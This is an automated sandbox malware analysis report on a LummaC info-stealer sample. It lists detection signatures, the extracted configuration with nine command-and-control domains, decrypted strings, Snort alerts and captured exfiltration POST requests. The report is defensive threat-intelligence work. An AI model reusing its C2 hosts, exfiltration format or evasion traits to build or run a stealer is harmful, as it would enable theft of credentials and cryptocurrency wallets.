Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1429089
MD5:0b4ad1c3b3f364c3d79fabdb47fe3385
SHA1:85de5462d6342f03eaf3fb48176615fa6fa18508
SHA256:21f247c6c84b114525d41500d54a63ab4bcea96d14ba8ca13be445acd72a081d
Tags:exe
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Detected VMProtect packer
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 6816 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0B4AD1C3B3F364C3D79FABDB47FE3385)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["demonstationfukewko.shop", "liabilitynighstjsko.shop", "alcojoldwograpciw.shop", "incredibleextedwj.shop", "shortsvelventysjo.shop", "shatterbreathepsw.shop", "tolerateilusidjukl.shop", "productivelookewr.shop", "greetclassifytalk.shop"], "Build id": "4sxFKu--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      Process Memory Space: file.exe PID: 6816JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: file.exe PID: 6816JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: file.exe PID: 6816JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
              No Sigma rule has matched
              Timestamp:04/20/24-19:20:56.333314
              SID:2052028
              Source Port:52332
              Destination Port:53
              Protocol:UDP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-19:21:01.309164
              SID:2052037
              Source Port:49735
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-19:20:56.483623
              SID:2052037
              Source Port:49730
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-19:20:57.310065
              SID:2052037
              Source Port:49731
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-19:21:00.168650
              SID:2052037
              Source Port:49734
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-19:20:58.261554
              SID:2052037
              Source Port:49732
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-19:21:03.516500
              SID:2052037
              Source Port:49737
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-19:20:59.171078
              SID:2052037
              Source Port:49733
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-19:21:02.107071
              SID:2052037
              Source Port:49736
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: file.exeAvira: detected
              Source: 0.2.file.exe.fa0000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["demonstationfukewko.shop", "liabilitynighstjsko.shop", "alcojoldwograpciw.shop", "incredibleextedwj.shop", "shortsvelventysjo.shop", "shatterbreathepsw.shop", "tolerateilusidjukl.shop", "productivelookewr.shop", "greetclassifytalk.shop"], "Build id": "4sxFKu--"}
              Source: https://greetclassifytalk.shop/apiVirustotal: Detection: 11%Perma Link
              Source: https://greetclassifytalk.shop:443/apiVirustotal: Detection: 11%Perma Link
              Source: file.exeJoe Sandbox ML: detected
              Source: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpString decryptor: demonstationfukewko.shop
              Source: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpString decryptor: liabilitynighstjsko.shop
              Source: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpString decryptor: alcojoldwograpciw.shop
              Source: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpString decryptor: incredibleextedwj.shop
              Source: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpString decryptor: shortsvelventysjo.shop
              Source: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpString decryptor: shatterbreathepsw.shop
              Source: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpString decryptor: tolerateilusidjukl.shop
              Source: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpString decryptor: productivelookewr.shop
              Source: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpString decryptor: greetclassifytalk.shop
              Source: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpString decryptor: 4sxFKu--
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB5999 CryptUnprotectData,0_2_00FB5999
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00FC2458
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00FBC540
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, dword ptr [esp+04h]0_2_00FD57CA
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, dword ptr [esp+04h]0_2_00FD59E2
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]0_2_00FD3D10
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, dword ptr [esp+08h]0_2_00FD3D10
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+70h]0_2_00FC4084
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+70h]0_2_00FC4087
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]0_2_00FAD140
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then inc ebx0_2_00FB42F0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+70h]0_2_00FC3943
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov esi, ebp0_2_00FA3260
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, dword ptr [esi+10h]0_2_00FBF234
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then push 00000000h0_2_00FBE451
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h0_2_00FBA420
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], dx0_2_00FBA420
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp+4Ch], 00000000h0_2_00FD5412
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_00FB4596
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], dx0_2_00FB46E6
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, dword ptr [esi+10h]0_2_00FBF640
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then inc eax0_2_00FB37C9
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, dword ptr [esi+4Ch]0_2_00FC271D
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ebx+esi+02h], 0000h0_2_00FBA8C0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_00FC58A2
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]0_2_00FC58A2
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00FCF890
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, word ptr [edx]0_2_00FBF828
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_00FC59D2
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_00FC59CD
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_00FC594F
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp byte ptr [esi+ebx+01h], 00000000h0_2_00FBCAEC
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebp, byte ptr [eax+edx]0_2_00FD1A70
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then inc ebx0_2_00FAFA49
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, dword ptr [esi+000000E0h]0_2_00FB1A44
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00FB6CDD
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]0_2_00FC1CC7
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, dword ptr [esi+30h]0_2_00FC4CB0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, dword ptr [esp+000000A4h]0_2_00FB4C49
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp edx0_2_00FD7C45
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp edx0_2_00FD7C47
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, dword ptr [esi+000000C0h]0_2_00FB3C46
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, dword ptr [esp+00000084h]0_2_00FB5D7D
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, dword ptr [esi+000005E0h]0_2_00FB3E4A
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, dword ptr [esi+04h]0_2_00FAEF2D

              Networking

              barindex
              Source: TrafficSnort IDS: 2052028 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (greetclassifytalk .shop) 192.168.2.4:52332 -> 1.1.1.1:53
              Source: TrafficSnort IDS: 2052037 ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI) 192.168.2.4:49730 -> 172.67.177.98:443
              Source: TrafficSnort IDS: 2052037 ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI) 192.168.2.4:49731 -> 172.67.177.98:443
              Source: TrafficSnort IDS: 2052037 ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI) 192.168.2.4:49732 -> 172.67.177.98:443
              Source: TrafficSnort IDS: 2052037 ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI) 192.168.2.4:49733 -> 172.67.177.98:443
              Source: TrafficSnort IDS: 2052037 ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI) 192.168.2.4:49734 -> 172.67.177.98:443
              Source: TrafficSnort IDS: 2052037 ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI) 192.168.2.4:49735 -> 172.67.177.98:443
              Source: TrafficSnort IDS: 2052037 ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI) 192.168.2.4:49736 -> 172.67.177.98:443
              Source: TrafficSnort IDS: 2052037 ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI) 192.168.2.4:49737 -> 172.67.177.98:443
              Source: Malware configuration extractorURLs: demonstationfukewko.shop
              Source: Malware configuration extractorURLs: liabilitynighstjsko.shop
              Source: Malware configuration extractorURLs: alcojoldwograpciw.shop
              Source: Malware configuration extractorURLs: incredibleextedwj.shop
              Source: Malware configuration extractorURLs: shortsvelventysjo.shop
              Source: Malware configuration extractorURLs: shatterbreathepsw.shop
              Source: Malware configuration extractorURLs: tolerateilusidjukl.shop
              Source: Malware configuration extractorURLs: productivelookewr.shop
              Source: Malware configuration extractorURLs: greetclassifytalk.shop
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: greetclassifytalk.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: greetclassifytalk.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: greetclassifytalk.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: greetclassifytalk.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: greetclassifytalk.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7079Host: greetclassifytalk.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1389Host: greetclassifytalk.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 579140Host: greetclassifytalk.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownDNS traffic detected: queries for: greetclassifytalk.shop
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: greetclassifytalk.shop
              Source: file.exe, 00000000.00000003.1691804794.0000000003D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: file.exe, 00000000.00000003.1691804794.0000000003D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: file.exe, 00000000.00000003.1691804794.0000000003D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: file.exe, 00000000.00000003.1691804794.0000000003D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: file.exe, 00000000.00000003.1691804794.0000000003D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: file.exe, 00000000.00000003.1691804794.0000000003D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: file.exe, 00000000.00000003.1691804794.0000000003D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: file.exe, 00000000.00000003.1691804794.0000000003D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: file.exe, 00000000.00000003.1691804794.0000000003D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: file.exe, 00000000.00000003.1691804794.0000000003D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: file.exe, 00000000.00000003.1691804794.0000000003D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: file.exe, 00000000.00000003.1674099563.0000000003D88000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673861505.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: file.exe, 00000000.00000003.1693486798.0000000000EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
              Source: file.exe, 00000000.00000003.1693486798.0000000000EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
              Source: file.exe, 00000000.00000003.1674099563.0000000003D88000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673861505.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: file.exe, 00000000.00000003.1674099563.0000000003D88000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673861505.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: file.exe, 00000000.00000003.1674099563.0000000003D88000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673861505.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: file.exe, 00000000.00000003.1693486798.0000000000EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
              Source: file.exe, 00000000.00000003.1693486798.0000000000EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: file.exe, 00000000.00000003.1674099563.0000000003D88000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673861505.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: file.exe, 00000000.00000003.1674099563.0000000003D88000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673861505.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: file.exe, 00000000.00000003.1674099563.0000000003D88000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673861505.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: file.exe, 00000000.00000002.1745794964.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1664983879.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1745345269.0000000000EAD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1746073047.0000000000EAF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1682855483.0000000000E3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greetclassifytalk.shop/
              Source: file.exe, 00000000.00000003.1691295811.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1691560780.0000000000EA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greetclassifytalk.shop/$Q
              Source: file.exe, 00000000.00000003.1664983879.0000000000E4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greetclassifytalk.shop/%D
              Source: file.exe, 00000000.00000003.1682855483.0000000000E3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greetclassifytalk.shop/)tO#
              Source: file.exe, 00000000.00000003.1673148684.0000000000E3A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1682855483.0000000000E87000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1746018029.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1745362507.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1664983879.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1745362507.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1745794964.0000000000E8B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1682855483.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1745794964.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673941731.0000000000E3A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1682855483.0000000000E3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greetclassifytalk.shop/api
              Source: file.exe, 00000000.00000003.1682855483.0000000000E87000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1664983879.0000000000E4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greetclassifytalk.shop/api-
              Source: file.exe, 00000000.00000003.1745362507.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1745794964.0000000000E8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greetclassifytalk.shop/api0
              Source: file.exe, 00000000.00000003.1664983879.0000000000E4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greetclassifytalk.shop/apiCz
              Source: file.exe, 00000000.00000003.1664983879.0000000000E4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greetclassifytalk.shop/apik
              Source: file.exe, 00000000.00000003.1682855483.0000000000E3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greetclassifytalk.shop/gtu#
              Source: file.exe, 00000000.00000003.1682855483.0000000000E3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greetclassifytalk.shop/nt
              Source: file.exe, 00000000.00000003.1673148684.0000000000E3A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673941731.0000000000E3A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1682855483.0000000000E3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greetclassifytalk.shop:443/api
              Source: file.exe, 00000000.00000003.1693486798.0000000000EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
              Source: file.exe, 00000000.00000003.1673429503.0000000003DCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: file.exe, 00000000.00000003.1692808922.0000000003E99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: file.exe, 00000000.00000003.1692808922.0000000003E99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: file.exe, 00000000.00000003.1673429503.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673523212.0000000003DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: file.exe, 00000000.00000003.1673523212.0000000003DA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: file.exe, 00000000.00000003.1673429503.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673523212.0000000003DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: file.exe, 00000000.00000003.1673523212.0000000003DA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: file.exe, 00000000.00000003.1693486798.0000000000EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
